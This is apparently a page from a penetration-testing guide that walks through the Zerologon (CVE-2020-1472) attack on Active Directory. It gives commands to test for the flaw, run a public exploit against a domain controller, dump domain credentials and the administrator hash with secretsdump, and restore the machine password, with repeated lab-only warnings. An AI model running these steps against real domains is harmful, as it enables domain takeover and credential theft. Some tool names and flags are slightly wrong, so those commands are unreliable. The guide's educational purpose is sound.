Zerologon (CVE-2020-1472)

Zerologon (CVE-2020-1472) is a critical vulnerabilities in Active Directory. I’m dedicating a separate section to this because, if misimplemented, it has the potential to compromise the entire domain controller or admin access.

Important Note: DO NOT ATTEMPT THIS UNLESS IN A CONTROLLED, VIRTUAL ENVIRONMENT.

Ensure you are able to restore the system before proceeding.

Step-by-Step Process to Check for Zerologon Vulnerability

  1. Check if the Domain is Vulnerable:

    Use the following script to test if your domain is vulnerable to Zerologon:

python3 zerologon_tester.py <domain-name> <ip>

WARNING again: Only run this in a virtual environment or if you're certain you can restore the system (which is unlikely).

  1. Clone the PoC from GitHub

  2. Run the PoC:

Execute the following command to initiate the attack:

python cve-2020-1472-exploit.py <domain-name> <ip>

  1. Verify if the Attack Succeeded:

If successful, the domain will likely be compromised. To confirm this, use the SecretsDump tool to attempt to retrieve the credentials of domain controllers:

secretdump.py -just-dc <domain-name>/HYDRA-DC$@<dc-ip>

  1. Restore the Machine:

Once the attack is complete and credentials have been dumped, immediately restore the machine. To begin, you will need to capture the administrator hash.

Use the following command to dump the administrator hash:

secretdump.py <domain-name>/administrator@<dc-ip> -hash <admin-hash>

  1. Recover the Password:

After obtaining the administrator hash, use the Restore Password Script to reset the administrator password.

Clone the restore script from here

Run the restore script:

bashCopy codepython3 restorepassword.py <domain-name>/HYDRA-DC$@<dc-ip> -target-ip <target-ip> -hexpass <plaintext-password-hex>

Critical Reminder: DO NOT attempt these actions on live systems or without proper authorization. This guide is purely for educational and controlled testing purposes.

Resources :

What is ZeroLogon? - https://www.trendmicro.com/en_us/what-is/zerologon.html

dirkjanm CVE-2020-1472 - https://github.com/dirkjanm/CVE-2020-1472

SecuraBV ZeroLogon Checker - https://github.com/SecuraBV/CVE-2020-1472

PreviousSome Other AttacksNextPrintNightmare (CVE-2021-1675)

Last updated